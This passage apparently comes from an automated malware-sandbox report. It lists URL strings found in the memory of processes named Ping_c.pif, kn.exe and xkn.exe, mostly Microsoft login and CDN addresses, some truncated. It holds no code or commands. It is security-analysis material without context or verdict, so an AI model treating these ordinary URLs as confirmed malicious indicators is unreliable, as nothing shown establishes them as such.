        Source: Ping_c.pif, Ping_c.pif, 0000001F.00000002.2707007653.00000000021C2000.00000004.00001000.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2708904655.0000000002940000.00000040.00001000.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2727734958.000000007FC40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
        Source: kn.exeString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
        Source: kn.exe, 00000009.00000002.1463535859.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1459705858.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000002.1516633974.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000000.1507474970.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.7.drString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
        Source: Ping_c.pif, 0000001F.00000003.2012981796.00000000271ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acctcdn.m
        Source: Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acctcdn.msauth.net
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acctcdn.msauth.net/
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acctcdn.msftauth.net
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acctcdn.msftauth.net/
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acctcdnmsftuswe2.azureedge.net/
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acctcdnvzeuno.azureedge.net/
        Source: xkn.exe, 00000011.00000002.1501921672.00000223D54B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
        Source: xkn.exe, 00000011.00000002.1501921672.00000223D54FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
        Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
        Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
        Source: Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipv6.login.live.com
        Source: Ping_c.pif, 0000001F.00000003.2357978518.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lgincdnmsftuswe2.azureedge.ne
        Source: Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lgincdnmsftuswe2.azureedge.net
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lgincdnmsftuswe2.azureedge.net/
        Source: Ping_c.pif, 0000001F.00000003.1882008954.0000000027219000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888765366.0000000027219000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lgincdnvzeuno.azureed
        Source: Ping_c.pif, 0000001F.00000003.1859829424.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1853005680.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lgincdnvzeuno.azureedgL
        Source: Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lgincdnvzeuno.azureedge.net
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lgincdnvzeuno.azureedge.net/
        Source: Ping_c.pif, 0000001F.00000002.2726741587.000000002721D000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2555976408.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2555976408.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2662272349.00000000007B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/
        Source: Ping_c.pif, 0000001F.00000003.2587882016.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/#
        Source: Ping_c.pif, 0000001F.00000003.2555257376.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587882016.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/4
        Source: Ping_c.pif, 0000001F.00000003.1673627946.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/:p
        Source: Ping_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/H
        Source: Ping_c.pif, 0000001F.00000003.2555257376.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587882016.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/L
        Source: Ping_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/s
        Source: Ping_c.pif, 0000001F.00000003.2555257376.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587882016.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/w
        Source: Ping_c.pif, 0000001F.00000003.2019992136.0000000027215000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048630262.000000002721C000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2012981796.00000000271ED000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048630262.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048630262.0000000027215000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1859650606.00000000271F2000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1921428842.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706808669.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2080003619.0000000027219000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1793555694.00000000271F1000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1744338495.00000000271F1000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1826526825.00000000271F1000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2144538741.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
        Source: Ping_c.pif, 0000001F.00000003.1673520794.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1634366147.00000000007E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
        Source: Ping_c.pif, 0000001F.00000003.1953069294.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1946086509.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/%
        Source: Ping_c.pif, 0000001F.00000003.2627952934.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2394138435.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2662272349.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357978518.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2703452505.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/&
        Source: Ping_c.pif, 0000001F.00000003.2587882016.000000002721D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/2
        Source: Ping_c.pif, 0000001F.00000003.2662272349.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627952934.00000000007CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/=
        Source: Ping_c.pif, 0000001F.00000002.2703452505.00000000007E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/A
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/D
        Source: Ping_c.pif, 0000001F.00000003.1737745516.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1744390876.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2177670138.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1921671898.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/R
        Source: Ping_c.pif, 0000001F.00000003.2627952934.00000000007CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RS
        Source: Ping_c.pif, 0000001F.00000003.1592651131.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1593066185.00000000007F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/US1
        Source: Ping_c.pif, 0000001F.00000003.2459802215.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2588420742.00000000007E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/V
        Source: Ping_c.pif, 0000001F.00000003.2662272349.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2216274021.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627952934.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2703452505.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/Y
        Source: Ping_c.pif, 0000001F.00000003.2587882016.000000002721D000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2555257376.0000000027219000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2523723266.000000002721F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/cC.5
        Source: Ping_c.pif, 0000001F.00000003.1706671192.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1673520794.00000000007F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/d
        Source: Ping_c.pif, 0000001F.00000003.2080225046.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2020192072.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2111822434.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/h
        Source: Ping_c.pif, 0000001F.00000003.1793555694.00000000271F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=1fadaa5e49104e979224c67aeaa4b7ae
        Source: Ping_c.pif, 0000001F.00000003.2048630262.000000002721C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=2c7589270b4343c0a3c59373b83e1dd4
        Source: Ping_c.pif, 0000001F.00000003.1706808669.00000000271EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=41987e8c86dc4a1abab22e1963cceeb0
        Source: Ping_c.pif, 0000001F.00000003.2048630262.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2144538741.00000000271EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=515e3a4699634776859
        Source: Ping_c.pif, 0000001F.00000003.2012981796.00000000271ED000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1921428842.00000000271EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=515e3a46996347768593eabc11a147a6
        Source: Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=6f2dfc9db08748c2b8f9269f709c97cf
        Source: Ping_c.pif, 0000001F.00000003.1744338495.00000000271F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=74e8ee1068844c4d8dd2e039108300e1
        Source: Ping_c.pif, 0000001F.00000003.2080003619.0000000027219000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=b118915afffd482fb79cf45eccde5291
        Source: Ping_c.pif, 0000001F.00000003.1826526825.00000000271F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=c26f9e12bbad471ca7b0a505d4336c44
        Source: Ping_c.pif, 0000001F.00000003.2048630262.0000000027215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=f8f700404dd
        Source: Ping_c.pif, 0000001F.00000003.2019992136.0000000027215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=f8f700404dd64de990b5afe28ef7290a
        Source: Ping_c.pif, 0000001F.00000003.2587882016.000000002721D000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2555257376.0000000027219000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2523723266.000000002721F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/l
        Source: Ping_c.pif, 0000001F.00000003.2587882016.000000002721D000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2555257376.0000000027219000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2523723266.000000002721F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/lo
        Source: Ping_c.pif, 0000001F.00000003.2555257376.0000000027236000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2555976408.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=063690149B8E31AB&opid=16063D7ABF02962
        Source: Ping_c.pif, 0000001F.00000003.2662272349.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2726741587.000000002723A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=0860495E926678A3&opid=450663BF1F5C0CE
        Source: Ping_c.pif, 0000001F.00000003.2177670138.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2177405424.0000000027222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=0AF2CDA0278E26DD&opid=AA6F3B4A901F325
        Source: Ping_c.pif, 0000001F.00000003.1706868174.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706649495.00000000271F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=140B94D0A89BAC5B&opid=890C5555777F28C
        Source: Ping_c.pif, 0000001F.00000003.2012981796.00000000271ED000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1920846634.0000000027216000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048630262.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1922014929.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=18A8D9815092E124&opid=53E1510DC81D2C9
        Source: Ping_c.pif, 0000001F.00000003.2288971180.0000000027226000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2288367402.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=1A28F24F3A0C62E2&opid=DA215CBA73B8C1D
        Source: Ping_c.pif, 0000001F.00000003.1737658652.00000000007F9000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1744531159.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=2852E581C330F4F5&opid=37C420339CE2257
        Source: Ping_c.pif, 0000001F.00000003.2459802215.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2460286645.0000000027226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=28D084576CBCC1A4&opid=80E3768805479CB
        Source: Ping_c.pif, 0000001F.00000003.2020461089.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2012764000.0000000027235000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2012764000.0000000027228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=319ABC075F082527&opid=21BBA881A27C97C
        Source: Ping_c.pif, 0000001F.00000003.2523153256.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2523723266.000000002723E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=3B29555887FD8215&opid=7908080ABA4F259
        Source: Ping_c.pif, 0000001F.00000003.2250753517.0000000027273000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2250753517.0000000027280000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2251644605.0000000027236000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2251024340.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=416793654422A2A2&opid=9F9403001CB35BE
        Source: Ping_c.pif, 0000001F.00000002.2727134039.0000000027277000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2727134039.0000000027284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=4618DC44B81ABFBC&opid=0A688BA368B69DB
        Source: Ping_c.pif, 0000001F.00000003.1853165591.00000000271F1000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1860021021.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=50D4DD5A3A4DD0A4&opid=8528A328950AD0B
        Source: Ping_c.pif, 0000001F.00000003.2144487772.0000000027222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=51057F6240810432&opid=78AE070C2243ADD
        Source: Ping_c.pif, 0000001F.00000003.1826725982.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1819846373.00000000007F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=56ABE80EB46EF043&opid=CE25312F033C243
        Source: Ping_c.pif, 0000001F.00000003.2394138435.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2393740582.0000000027236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=5CAAA89783989808&opid=FF6CBFE54A4AFE2
        Source: Ping_c.pif, 0000001F.00000003.1635151705.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1633584244.0000000000803000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1634197074.00000000271E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=5E822A3BF427095F&opid=4EF04E5343DE37C
        Source: Ping_c.pif, 0000001F.00000003.1889176943.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1882008954.0000000027215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=66F85AEE6E1A38D2&opid=9AF4E5AF00B6C53
        Source: Ping_c.pif, 0000001F.00000003.2357978518.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.000000002723E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=6FD3B6FE9CA439BE&opid=534E6536191DA6B
        Source: Ping_c.pif, 0000001F.00000003.2049253919.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048402158.000000002721E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048402158.000000002723D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=8BB159EC545FD4CC&opid=B8E6087820D9061
        Source: Ping_c.pif, 0000001F.00000003.2321978307.000000002723A000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2321332613.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=99D40BDA67A73992&opid=EC15FC25298BDAB
        Source: Ping_c.pif, 0000001F.00000003.1673627946.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1666645491.00000000271EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=9F357AA6BB3F5705&opid=942879AACE6E273
        Source: Ping_c.pif, 0000001F.00000003.1793730015.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=9F87C516A70FE86C&opid=1E876D9E7ED75F2
        Source: Ping_c.pif, 0000001F.00000003.2587623073.0000000027277000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587623073.0000000027284000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2588420742.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587882016.0000000027232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=A8960C55EC47E0A0&opid=FE5D123C67DA08E
        Source: Ping_c.pif, 0000001F.00000003.1592357798.0000000000809000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=AD11851EFE6E1178&opid=CDC16117E87353B
        Source: Ping_c.pif, 0000001F.00000003.2493024630.000000002723E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2492438082.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=AE37B53AADDEF385&opid=75D23D4F0925B61
        Source: Ping_c.pif, 0000001F.00000003.2427994029.000000002723E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2427549071.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=B5C6D2470337F95A&opid=CF1911A3824D773
        Source: Ping_c.pif, 0000001F.00000003.2627952934.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.000000002723A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=C95F0BAF198CA94E&opid=93403BF04007A13
        Source: Ping_c.pif, 0000001F.00000003.2111719555.000000002721A000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2112272992.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=C9A28159FFE82111&opid=262425754920DCC
        Source: Ping_c.pif, 0000001F.00000003.2216274021.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2216187948.000000002722A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=C9B559A05F5FBD8F&opid=96CAF3B15C5F7EC
        Source: Ping_c.pif, 0000001F.00000003.2080225046.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2080476478.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=F1416000186E1BE8&opid=114202D085518AA
        Source: Ping_c.pif, 0000001F.00000003.1953336418.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1952917186.0000000027216000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=F487681EF4BF506A&opid=93539CF5DF35121
